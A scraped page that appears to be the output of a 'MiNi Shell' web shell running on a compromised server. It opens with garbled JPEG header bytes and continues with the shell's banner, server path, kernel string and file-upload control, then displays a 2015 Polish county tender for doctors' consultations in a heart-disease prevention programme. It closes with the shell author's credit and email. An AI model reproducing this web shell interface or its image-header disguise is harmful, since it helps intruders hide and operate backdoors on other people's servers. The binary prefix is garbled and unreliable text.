JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150522/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150522/121656-N-2015.html

<p class="kh_header"><b>Janów Lubelski: Świadczenie usług w zakresie opieki medycznej-konsultacji lekarskich w ramach projektu pt. Weź sobie zdrowie do serca - program profilaktyki i promocji zdrowia w powiecie janowskim w zakresie chorób układu krążenia  finansowany z Norweskiego Mechanizmu Finansowego 2009-2014 w ramach Programu PL 13 Ograniczanie społecznych nierówności w zdrowiu i budżetu państwa</b><br>
<b>Numer ogłoszenia: 121656 - 2015; data zamieszczenia: 22.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Janowie Lubelskim , ul. Zamoyskiego 59, 23-300 Janów Lubelski, woj. lubelskie, tel. 015 8723070, 8720309, faks 015 8723070.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatjanowski.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie opieki medycznej-konsultacji lekarskich w ramach projektu pt. Weź sobie zdrowie do serca - program profilaktyki i promocji zdrowia w powiecie janowskim w zakresie chorób układu krążenia  finansowany z Norweskiego Mechanizmu Finansowego 2009-2014 w ramach Programu PL 13 Ograniczanie społecznych nierówności w zdrowiu i budżetu państwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Celem ogólnym Programu pt.Weź sobie zdrowie do serca - program profilaktyki                              i promocji zdrowia w zakresie chorób układu krążenia w powiecie janowskim w ramach Programu PL 13 Ograniczanie społecznych nierówności w zdrowiu Norweskiego Mechanizmu Finansowego 2009 -2014 jest zmniejszenie zachorowalności na choroby związane ze stylem życia, tj. choroby układu krążenia w powiecie janowskim wśród osób w  wieku od 35-64 lat. 
Cel zostanie osiągnięty poprzez zwiększenie liczby osób w powiecie janowskim wobec których zastosowano badania profilaktyczne w Mobilnym i Stacjonarnym Punkcie Porad                       w kierunku chorób układu krążenia (4000 osób) poprzez realizację szeregu działań promocyjnych.
Dzięki realizacji zaplanowanych działań Program zakłada zwiększenie stopnia społecznej świadomości w zakresie profilaktyki chorób układu krążenia oraz promocję i utrwalenie zachowań prozdrowotnych - w szczególności w zakresie aktywności fizycznej                                     i właściwego sposobu odżywiania, a także zwiększenie dostępności do świadczeń medycznych. Zaplanowane działania przyczynią się do osiągnięcia celów projektu oraz celów Programu  PL 13.
Działania profilaktyczne obejmujące Punkty Porad: Mobilny i Stacjonarny, które proponują następujące wsparcie: poradę lekarską, dietetyka oraz instruktora rekreacji ruchowej, określenie wskaźnika BMI, poziomu glukozy i cholesterolu, ciśnienia krwi, wykonanie badanie EKG. Przeprowadzona zostanie także ankieta zdrowotna, która                           w połączeniu z badaniami pozwoli na określenie ryzyka zachorowania na choroby układu krążenia.

Celem działania Mobilnego Punktu Porad, który będzie funkcjonował objazdowo                         w różnych miejscowościach na terenie powiatu janowskiego jest przeprowadzenie badań profilaktycznych w zakresie chorób układu krążenia u 3800 pacjentów w wieku 35-64 lata w okresie od podpisania umowy do dnia 31 marca 2016 r. 

Niniejsze zmówienie obejmuje pracę lekarzy (łącznie 10 osób) w Mobilnym Punkcie Porad łącznie przez 100 dni po 6 godzin dziennie w godz. 1000 - 1600 oraz udzielenie 200 konsultacji lekarskich w Stacjonarnym Punkcie Porad, który będzie czynny od poniedziałku do piątku (w dni robocze) w godz. 800 - 1200 oraz 1500 - 1900 w okresie realizacji umowy.
Mobilne Punkty Porad będą funkcjonować według harmonogramu pracy MPP opracowanego przez Zamawiającego:
- po dwa dni w weekendy (sobota i niedziela), w tym w czasie pikników zdrowotnych organizowanych w ramach projektu,
- oraz w piątki (w dni robocze) wyznaczone przez Zamawiającego.
Obsługę jednodniową Mobilnego Punktu Porad będzie zapewniać jeden lekarz.
Do zadań lekarza w Mobilnym Punkcie Porad należy:
1.	Opis badania EKG wykonanego w Punkcie;
2.	Wpis informacji o opisie badania EKG do systemu komputerowego - systemu informatycznego do nadzoru realizacji programu;
3.	Wykonanie badania fizykalnego i wywiadu z pacjentem w zakresie chorób układu krążenia oraz wstępna analiza stanu zdrowia pacjenta na podstawie wykonanych        w Punkcie badań: EKG, wskaźnika BMI, poziomu glukozy, cholesterolu oraz ciśnienia krwi, z uwzględnieniem SCORE (ang. Systematic Coronary Risk Evaluation) - skala oceny ryzyka sercowo-naczyniowego;
4.	Konsultacja lekarska zakończona ewentualnym skierowaniem pacjenta do etapu pogłębionych badań diagnostycznych;
5.	Wpis informacji do ankiet zdrowotnych i kart informacyjnych pacjentów;
6.	Kompetentny i życzliwy kontakt z pacjentem zgłaszającym się do Punktu;
7.	Udział w organizacji pracy Punktu;
8.	Zachowanie należytej dbałości przy użytkowaniu wyposażenia, sprzętu, materiałów medycznych niezbędnych do prawidłowej realizacji zadań Punktu, zapewnionych        i należących do Powiatu Janowskiego;
9.	Współpraca z koordynatorem działań profilaktycznych.

Do zadań lekarza w Stacjonarnym Punkcie Porad mieszczącym się w Samodzielnym Publicznym Zespole Zakładów Opieki Zdrowotnej w Janowie Lubelskim, ul. Zamoyskiego 149, należeć będzie:

1.	Opis badania EKG wykonanego w Punkcie;
2.	Wpis informacji o opisie badania EKG do systemu komputerowego - systemu informatycznego do nadzoru realizacji programu;
3.	Wykonanie badania fizykalnego i wywiadu z pacjentem w zakresie chorób układu krążenia oraz wstępna analiza stanu zdrowia pacjenta na podstawie wykonanych        w Punkcie badań: EKG, wskaźnika BMI, poziomu glukozy, cholesterolu oraz ciśnienia krwi, z uwzględnieniem SCORE;
4.	Konsultacja lekarska zakończona ewentualnym skierowaniem pacjenta do etapu pogłębionych badań diagnostycznych;
5.	Wpis informacji do ankiet zdrowotnych i kart informacyjnych pacjentów;
6.	Kompetentny i życzliwy kontakt z pacjentem zgłaszającym się do Punktu;
7.	Zachowanie należytej dbałości przy użytkowaniu wyposażenia, sprzętu, materiałów medycznych niezbędnych do prawidłowej realizacji zadań Punktu, zapewnianych                         i należących do Powiatu Janowskiego;
8.	Współpraca z koordynatorem działań profilaktycznych.
Konsultacja lekarska wykonana przez lekarza w Stacjonarnym Punkcie Porad ma odbyć się po wcześniejszym uzgodnieniu terminu wizyty pacjenta przez pielęgniarkę/rejestratorkę.

 Uwagi Ogólne:
1.	Każdy lekarz musi posiadać własne ubranie ochronne oraz stetoskop.
2.	Zamawiający zapewni transport lekarza z Janowa Lubelskiego (SP ZZOZ) do miejsc pracy Mobilnego Punktu Porad na terenie Powiatu Janowskiego.
3.	Lekarze wspólnie zobowiązani są do ustalenia warunków - kryteriów kwalifikacji pacjenta zgłaszającego się do Punktów Porad do etapu pogłębionych badań diagnostycznych, realizowanych w ramach Programu. Nadzór nad opracowaniem niniejszych warunków pełnił będzie lekarz o najwyższym stażu pracy lub najwyższym tytule naukowym.
4.	Opracowane kryteria  obowiązywać będą wszystkich  lekarzy pracujących                                  w Punktach Porad..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które Wykonawcy są    
zobowiązani spełnić.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które Wykonawcy są    
zobowiązani spełnić.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które Wykonawcy są    
zobowiązani spełnić.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że dysponuje 10 osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadających kwalifikacje (uprawnienia) tj.  dyplom lekarza medycyny, aktualne prawo do wykonywania zawodu oraz min. 1 rok pracy w zawodzie lekarza.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które Wykonawcy są    zobowiązani spełnić.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - doświadczenie, staż pracy w zawodzie lekarza - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Ewentualne zmiany umowy dotyczyć mogą m.in.:
a) zmiany terminów i płatności objętych Umową - w przypadku, gdy o zmianę taką wystąpi Zamawiający, lub zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania oferty,
       b) zmiany wynagrodzenia - w przypadku urzędowej zmiany wysokości stawki podatku   VAT lub zasad opodatkowania,
       c)  zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia wskazanych przez Wykonawcę w Zał. Nr 5 do SIWZ. Warunki tej zmiany to m.in.: śmierć, choroba, śmierć i choroba osoby bliskiej, utrata uprawnień, zmiana miejsca zamieszkania, uniemożliwiająca wykonywanie przedmiotowego zadania i innej uzasadnionej rezygnacji i inne zdarzenia losowe zaistniałe z przyczyn niezależnych od Zamawiającego i Wykonawcy, skutkujących obiektywną niemożnością pełnienia funkcji przez daną osobę. Zmiana osób (powołania nowych) wyznaczonych do pełnienia funkcji będzie możliwa na uzasadniony wniosek Wykonawcy, po zaakceptowaniu przez Zamawiającego kandydatury innej osoby, tj. pod warunkiem, że posiada kwalifikacje (uprawnienia) nie niższe niż wymagane przez Zamawiającego                     w SIWZ.
2.    Zamawiający dopuszcza także możliwość zmian umowy w następujących przypadkach:
a) gdy zaistnieją okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w chwili zawarcia umowy, pod warunkiem, że zmiana ta sprzyjać będzie optymalnemu wykonaniu zamówienia, jak również oszczędnemu, celowemu  gospodarnemu wydatkowaniu środków finansowych,
b) gdy wprowadzenie zmian jest korzystne dla Zamawiającego,
c) gdy wystąpią zdarzenia losowe,
d) gdy wystąpią zmiany, których konieczność wprowadzenia będzie wynikała z wymagań instytucji współfinansujących realizację przedmiotu umowy,
e) gdy wystąpi zmiana powszechnie obowiązujących przepisów prawa, których uchwalenie bądź zmiana nastąpiła w czasie trwania niniejszej umowy, a z których treści wynika konieczność lub zasadność wprowadzenia zmian mających wpływ na realizację umowy,
f) gdy realizacja w drodze odrębnej umowy zamówień powiązanych z przedmiotem niniejszego zamówienia - wymuszających konieczność wstrzymania lub zmiany sposobu realizacji przedmiotu zamówienia objętego umową,
g) gdy zaistnieje inna trudna do przewidzenia okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania zamówienia zgodnie z zawartą Umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatjanowski.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Janowie Lubelskim ul. Zamoyskiego 59, 23-300 Janów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2015 godzina 10:00, miejsce: Starostwo Powiatowe w Janowie Lubelskim ul. Zamoyskiego 59, 23-300 Janów Lubelski, pok. Nr 202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu pt. Weź sobie zdrowie do serca - program profilaktyki i promocji zdrowia w powiecie janowskim w zakresie chorób układu krążenia  finansowany z Norweskiego Mechanizmu Finansowego 2009-2014 w ramach Programu PL 13 Ograniczanie społecznych nierówności w zdrowiu  i budżetu państwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com